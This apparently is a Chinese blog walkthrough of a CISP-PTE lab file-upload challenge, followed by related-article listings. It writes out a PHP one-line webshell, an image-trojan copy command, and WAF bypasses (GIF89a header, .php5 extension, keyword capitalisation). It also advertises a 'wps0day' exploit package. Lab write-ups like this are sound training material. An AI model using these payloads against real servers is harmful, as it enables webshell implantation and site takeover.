题目2 文件上传(保姆级教程)【文末有惊喜】

已于 2023-08-31 10:58:27 修改
阅读量228 收藏 4
点赞数
分类专栏: # CISP-PTE-Centos 文章标签: cisp-pte cisp 靶机 文件上传漏洞 web安全
于 2023-07-21 10:55:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/honest_run/article/details/131847224
版权

url:http://192.168.154.253:82/  #打开http://XXX:81/,XXX为靶机的ip地址

审题

1、打开题目看到有一个提示,此题目需要绕过WAF过滤规则,上传木马获取webshell,最后从根目录下key.php文件中获得flag

2、开始答题

第一步:判断过滤规则

1、上传正常的图片(.jpg格式)

2、盲猜是做了黑名单或者是白名单的校验,尝试制作上传图片木马进行过滤绕过

准备工作:

  • 1个正常上传的图片
  • 1个一句话木马(php)

执行命令:

copy 1.jpg/b+1.php YiJuHua.jpg/b

上传图片木马

上传成功

3、连接图片木马

—— 这里测试连接不成功,是由于WAF不止对文件后缀做了校验,还对文件内容进行了校验

4、猜测是WAF进行了数据包内容校验,使用burp抓包,修改数据包(注意,需要burp截断更改数据包内容

修改文件后缀:php3、php5、pht等

修改文件格式:

GIF89a

<?php @eval($_POST['shell']);?>

关键字大小写绕过过滤:

<?php @Eval($_POST['shell']);?>

解释:

  • 通常,在嵌入了php脚本的html中,使用 phtml作为后缀名;完全是php写的,则使用php作为后缀名。这两种文件,web服务器都会用php解释器进行解析。
  • 当不能使用php代码直接注入时可以改为phtml格式加入GIF89a(图片头文件欺骗),后台认为是图片,上传后再执行木马。
  • 先将文件改为.jpg欺骗网址第一层,抓包将filename改为以.php5结尾进行文件后缀校验绕过,GIF89a则负责骗过文件头部校验第二层,最后修改evalEval,进行大写绕过关键字过滤第三层防护。

上传成功:http://192.168.154.253:82/vulnerabilities/YiJuHua.php5

5、连接后门地址

6、获得flag

 猎杀时刻

        目前在GG安全公众号中回复关键字"wps0day",即可获得wps打包套件及poc。

        为了方便师傅们的交流学习,根据广大师傅们的建议,我在之后也会创建一个的群聊。预计在内部群内,我们将分享一些脱敏的漏洞报告和渗透测试实战案例,还将会有一些经验丰富的大牛和巨佬分享他们的经验。后续还将提供一些福利,例如送书和小礼物等等。欢迎师傅们到时候加入群聊,一起交流学习,致力打造一个有丰富学习氛围的小圈子。

xjizhi(GG安全)
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
中视频项目保姆实战教程-视频教程网盘链接提取码下载 .txt
05-22
十节视频课,主要讲内容制作和账号运营:包括选题、素材、文案、配音、剪辑以及运营维护的一些实战经验和实操演示。我讲的都是我们自己做出结果的,适合大家去模仿复制的实战玩法。通过这十节课,你能快速掌握中视频...
WEB安全---文件上传2(upload-labs解题前十关)
qq_41759633的博客
08-09 590
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 第一关: ...
HTTP的请求头内容
m0_37550680的博客
05-13 595
每个HTTP请求都会携带相应的头部信息,头信息主要包含以下内容: Accept:客户端能够处理的内容类型 Accept-Charset:客户端能够处理的字符集 Accept-Encoding:浏览器能够处理的编码格式 Accept-Language:客户端当前的语言设置 Connection:当前连接的类型(一般会Keep-Alive) Cache-Control:缓存处理 Cook...
Bugku 哥哥的秘密
qq_52907838的博客
08-31 1万+
给了个QQ号,说是空间里藏了东西,进入空间,有两个提示: hint1:解题流程为:收集空间信息--相册--收集微博信息--相册--解题--相册--提交flag hint2:解题部分题目需要下载原图才能看到哦 说明第一步要在空间中找信息,往下看发现了一个类似盲文的东西: 猜测可能是盲文加密,在线网站解密:文本加密为盲文,可自设密码|文本在线加密解密工具 (qqxiuzi.cn) ⠀⡘⠀⡙⠀⡞⠀⡄⣿⠪⡛⣶⡸⠱⠀⠍⡥⣆⡗⠀⡎⢊== 得到下一步提示:hint:密码=时地人,意思是密码是“时间地点...
反调试花指令
wangjiabin2007的专栏
07-08 1541
<br />push ********<br />mov eax,dword ptr fs:[0]<br />push eax<br />mov dword ptr fs:[0],esp<br />mov esi,0<br />mov eax,dword ptr ds:[esi]<br />其中*********的地方是你要跳转的地址<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />push ********<br />mov eax,dword ptr f
CTFHUB刷题 反射型XSS攻击
null1024的博客
09-08 847
一、题目描述与分析 如上图, 进入题目页面,此时第一个框中是CTFHub,出现Hello,CTFHub 输入admin,发现出现变化,变为Hello,admin,可以考虑拼接位置 二、解题过程 输入以下代码,如图,点击Submit <script>alert(1)</script> 结果如图,说明拼接成功。 注册XSS平台,进行攻击,得到flag ...
小学教辅资料,内部集训保姆教程-教程网盘链接提取码下载.txt
12-21
小学招生人数1800万人,在校生有1亿多背后有1亿多的家长,这些家长是有明确的教辅资料需求的,并且付费能力强小学生群体每年都有更新,每年都会有新的小学生,新的家长需要这个教辅资料 项目特点 产品型项目,容易...
2023闲鱼无货源超详细保姆教程-视频教程网盘链接提取码下载.txt
12-18
本课程将深入探讨2023年闲鱼无货源情况,为您提供超详细的解决方案。我们将详细介绍如何寻找替代货源、建立稳定的供应链以及利用社交媒体拓展...这是一份保姆教程,确保您能迅速适应并获得成功。 视频大小:772M
CMake保姆教程2.pdf
02-26
CMake保姆教程2.pdf
保姆搭建rancher教程
09-06
看着手册能自己搭建出来,保姆教程,我自己一步一步写的,看完还不会的只能说你不适合运维,咱换行吧。你可以尝试去搞搞开发,开发写写代码就行。
技能大赛试题剖析:文件上传渗透测试
shatianyzg的博客
08-05 800
访问成功后上传名为backdoor.php的php一句话木马至服务器,打开控制台(使用vnc)使用网站安全狗检测本地是否存在木马,若检测出存在木马,则将木马所在的绝对路径作为Flag值提交,若未检测出木马则提交false;4.上传使用weevely生成的木马backdoor1.php至服务器中,打开控制台使用网站安全狗检测本地是否存在木马,若检测出存在木马,则将木马所在的绝对路径作为Flag值提交,若未检测出木马则提交false;渗透机:(Kali Linux 2.0)用户名:root 密码:toor。..
【原创手打】nsfocus-绿盟笔试题目参考答案!
weixin_33691817的博客
09-12 1374
曾经在绿盟干过2年安全工程师和风险评估咨询师,最近在网上闲逛看到有人把我曾经做过的绿盟笔试题贴了出来,试着做一份参考答案,希望我的解题思路能对想参加绿盟笔试的朋友有所帮助,绿盟的试题涵盖很广,我当是主攻的是主机安全,包括类unix和windows和网络通信安全,其实绿盟出这个题目就是为了考察参试者的知识深度与广度,并不要求全面回答,我记得我当年也就回答出来个五成左右吧。呵呵!...
HTTP请求方法
X7tian的博客
04-23 668
1.题目 2.打开目标网址提示我们用CTFHUB方式访问才能拿到flag,但是HTTP请求方式中并没有CTFHUB,于是想到用kali来操作。 3.使用kali的curl命令执行目标网址,得出flag。 ...
西普学院CTF习题解析——WEB(已完成16/16)
乐枕的家
09-15 2万+
源西普学院实验吧 预备知识点 页面调试 审查元素 html js php asp sql 等语法基础 请求头 响应头 伪造IP SQL注入基础 XSS基础 Web常用编码 “网站后台”概念及猜解、扫描技术 脑洞 工具参考 BurpSuite Firefox_firebug Firefox_tamperdata Firefox_modifyheader 御剑 XSSEE(编码解码器) sqlma
CTF隐写篇
weixin_44763914的博客
03-16 2151
CTF隐写篇 1、【彩虹的声音】风雨过后就会见到彩虹的,答案格式是key{xxxx},所以答案是? 【Their thinking】此题得到的是一个.wav的音频,打开后听到非常刺耳的声音。使用Adobe Audition CC打开Shift+D查看频谱频率便可发现flag。 2、【分解1】答案的格式是sctf{xxxxx},所以答案是 【Their thinking】 当拿到图片隐写的后首先查看...
nsfocus-笔试题
weixin_30828379的博客
09-18 1820
1.描述sendmail原理及通讯机制   sendmail程序接受到待发邮件后,通过关键字@判断邮件的格式是否符合要求,匹配成功后提取邮件后缀域名信息并查询DNS数据库相关MX(邮件专用)记录,若有匹配信息多于一条,选择优先更高的主机IP进行投递,如果没有查询到相关域名的MX记录则尝试与其根域名(163.com)25端口通讯并投递邮件,成功连接则投递信件,失败则将邮件打包退还发件者。 2....
HTTP请求头详解
热门推荐
Now . Or Never ``
12-08 12万+
<br /><br />HTTP由两部分组成:请求和响应。当你在Web浏览器中输入一个URL时,浏览器将根据你的要求创建并发送请求,该请求包含所输入的URL以及一些与浏览器本身相关的信息。当服务器收到这个请求时将返回一个响应,该响应包括与该请求相关的信息以及位于指定URL(如果有的话)的数据。直到浏览器解析该响应并显示出网页(或其他资源)为止。<br />HTTP请求<br />HTTP请求的格式如下所示:<br /><request-line><br /><headers><br /><blank lin
“微软蓝屏”事件暴露了网络安全哪些问题?
最新发布
Asunqingwen的博客
07-23 480
微软蓝屏事件虽然只是一次技术问题,但却暴露了当前网络安全中的诸多隐患,通过此次事件,我们应该深刻反思并采取相应措施,提升网络安全水平,保护用户和企业的信息安全。网络安全不仅仅是技术问题,更是一个系统工程,需要各方的共同努力。只有不断提升安全意识和防护能力,才能在瞬息万变的网络环境中立于不败之地。
gitee上传代码保姆教程沫北
05-18
好的,下面是 gitee 上传代码的保姆教程: 步骤一:注册账号 如果你没有 gitee 的账号,可以在官网上进行注册。注册完成后,登录你的账号。 步骤二:创建项目 登录后,在首页上方的 “+” 号下拉菜单中选择 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值